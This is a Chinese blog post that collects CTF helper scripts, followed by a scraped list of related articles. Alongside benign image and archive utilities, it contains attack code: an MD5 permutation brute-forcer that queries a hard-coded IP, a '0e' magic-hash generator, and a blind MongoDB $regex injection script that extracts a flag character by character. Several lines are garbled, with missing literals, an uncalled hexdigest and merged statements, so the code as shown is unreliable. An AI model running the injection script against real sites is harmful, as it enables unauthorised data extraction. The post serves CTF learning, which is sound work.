积累一点ctf需要掌握的常见脚本知识
1.利用像素点还原图片。
from PIL import Image
import re
if __name__ == '__main__':
x = 887 //将像素点个数进行分解,可以确定图片的长宽
y = 111
i = 0
j = 0 c = Image.new("RGB", (x,y))
file_object = open('ce.txt') //ce.txt中保存着像素点的坐标 for i in range(0, x):
for j in range(0, y):
line = file_object.next() //每次读取一个像素点
lst = line.split(",") //lst生成一个元组
c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2]))) c.show()
c.save("c.png")
2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。
#coding : utf8
import requests
import re
import hashlib
import itertools
s = requests.session() //建立一个session对话
url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
content = s.get(url=url,data=data)
target = re.findall("sh\"\>(.*)\<",content.text)
target = target[0]
poc = re.findall("code\"\>(.*)\<",content.text)
str1 = poc[0]
a = [''.join(x) for x in itertools.permutations(str1, 9)] //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组
for i in range(0,len(a)):
final = hashlib.md5(a[i])
if final.hexdigest() == target:
flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])
print flag.content
print flag.headers
3.利用py将base64编码的字符串还原成图片
import os,base64
strs='''''sdasdas==''' //已经编码的base64字符串 imgdata=base64.b64decode(strs)
file=open('1.jpg','wb')
file.write(imgdata)
file.close()
4.生成0e哈希值:
#coding:utf-8
import hashlib
import itertools
def go():
payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]
i = 0
print payload
for j in itertools.product(payload,repeat=30): #repeat参数指定长度
payloads = "".join(j)
#print pow
#i = i+ 1
#if i == 10:
# break
str1 = hashlib.md5(payloads).hexdigest + "SALT"
str2 = hashlib.md5(str1)
if (str2[0]=="") & (str2[1]=="e") & (str2[2:].isdigit()):
print payloads
go()
5.mongodb基于正则注入:
#coding:utf-8
import requests
import string
# print string.ascii_letters
# print string.digits
flag = "c1ctf{"
payload = string.ascii_letters + string.digits url = "http://xx.x.x.x/index.php?"
restsrt = True
while restsrt:
restsrt = False
for i in payload:
payloads = flag + i
post_data = {"username":"admin","passwd[$regex]":flag+".*"}
#post_data = {"username":"admin","passwd[$regex]":"^"+flag}
r = requests.get(url = url,data = post_data,allow_redirects = False)
if r.status_code == "":
print payloads
flag = flag + i
restsrt =True
if i == "}":
exit(0)
break
6.多次压缩打包
#coding:utf-8
import tarfile
for i in range(1,2):
tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩
tfile.add("flag.py")
tfile.close() for i in range(1,300):
tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")
tfile.add("1.php")
tfile.add("shell"+str(i-1)+".tar.gz")
tfile.close()
7.多次解压:
#coding:utf-8
import tarfile
for i in range(1,300)[::-1]:
file = tarfile.open("shell"+str(i)+"tar.gz")
file.extractall()
file.close()
积累一点ctf需要掌握的常见脚本知识的更多相关文章
- shell常见脚本30例
shell常见脚本30例 author:headsen chen 2017-10-19 10:12:12 本文原素材出自网上,特此申明.有些地方加入我自己的改动 常见的30例shell脚本 1.用 ...
- Python简单的CTF题目hash碰撞小脚本
Python简单的CTF题目hash碰撞小脚本 import hashlib for num in range(10000,9999999999): res = hashlib.sha1(str(nu ...
- Oracle手边常用70则脚本知识汇总
Oracle手边常用70则脚本知识汇总 作者:白宁超 时间:2016年3月4日13:58:36 摘要: 日常使用oracle数据库过程中,常用脚本命令莫不是用户和密码.表空间.多表联合.执行语句等常规 ...
- ctf密码学------密文解码python脚本(凯撒解密)
题目来源实验吧 分析题意,说是困在栅栏中,所以将字符栅栏解密看看有什么,利用工具CTFcraktools 得到三条密文 然后说是密码是凯撒,在将四栏依次凯撒解码,寻找可能的key,这里很显然,在尝试第 ...
- 放一点百度来的,常见的windowserror
0操作成功完成.1功能错误.2系统找不到指定的文件.3系统找不到指定的路径.4系统无法打开文件.5拒绝访问.6句柄无效.7存储控制块被损坏.8存储空间不足,无法处理此命令.9存储控制块地址无效.10环 ...
- python 常见脚本
一登录就发现了这篇博客,非常感谢作者,有时间会静下心来一点一滴的看 https://www.cnblogs.com/ailiailan/p/10141741.html
- bat脚本知识总结
1常用基本命令 1.1 @ 它的作用是让执行窗口中不显示它后面这一行的命令本身 1.2 echo 它其实是一个开关命令,就是说它只有两种状态:打开和关闭.于是就有了echo on 和echo off两 ...
- 积累一些不太常用的c语言知识(不断更新)
这里积累一些日常编程用得比较少的知识,不断添加. scanf("%c%*c%c",&a,&b); 其中的*表示跳过,本来输入三个数字,结果中间那个读入后被抛弃,a和 ...
- linux 常见基础知识(此文章将会在整个linux学习过程中,不断添加)
1,linux 文件类型 普通文件 目录文件 链接文件 块设备 字符设备 Socket 管道文件 - d l b c s p 2,linux 文件属性 蓝色 绿色 浅蓝色 红色 灰色 目录 可执行文件 ...
随机推荐
- hashchange事件的认识
写过路由的同学都知道其原理是通过URL的改变,由导航信息来决定页面信息...表述的好像有点不准确 这么说吧,只要URL参数列表只要变化就会调用hashchange事件,此时event对象包括oldUR ...
- 安装好grunt,cmd 提示"grunt不是内部或外部命令" 怎么办?
Grunt和所有grunt插件都是基于nodejs来运行的,因此,必须安装node.js. (一) 去官网http://nodejs.org/ 下载安装包 node-v6.9.2.msi,直接点击安装 ...
- js自定义对象
一,概述 在Java语言中,我们可以定义自己的类,并根据这些类创建对象来使用,在Javascript中,我们也可以定义自己的类,例如定义User类.Hashtable类等等. 目前在Javascrip ...
- iOS代码实现九宫格
#define ScreenW [UIScreen mainScreen].bounds.size.width #define ScreenH [UIScreen mainScreen].bounds ...
- 3个div 宽度移入移出时变化
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" ...
- Window 命令
tracert XXX.XXX.XXX.XXX 路由追踪命令,可以显示到目的IP所经过的路由
- spring 多线程 注入 服务层 问题
在用多线程的时候,里面要用到Spring注入服务层,或者是逻辑层的时候,一般是注入不进去的.具体原因应该是线程启动时没有用到Spring实例不池.所以注入的变量值都为null. 详细:http://h ...
- Regular Expression Matching leetcode
递归方法运行时间过长.考虑使用动态规划的方法. 代码如下: bool isMatch(string s, string p) { int i,j; int m=s.size(); int n=p.si ...
- 20145229&20145316《信息安全系统设计基础》实验一 开发环境的熟悉
实验封面 实验内容 本次实验使用 Redhat Linux 9.0 操作系统环境,安装 ARM-Linux 的开发库及编译器.创建一个新目录,并在其中编写 hello.c 和 Makefile 文件. ...
- jQuery选择器引擎和Sizzle介绍
一.前言 Sizzle原来是jQuery里面的选择器引擎,后来逐渐独立出来,成为一个独立的模块,可以自由地引入到其他类库中.我曾经将其作为YUI3里面的一个module,用起来畅通无阻,没有任何障碍. ...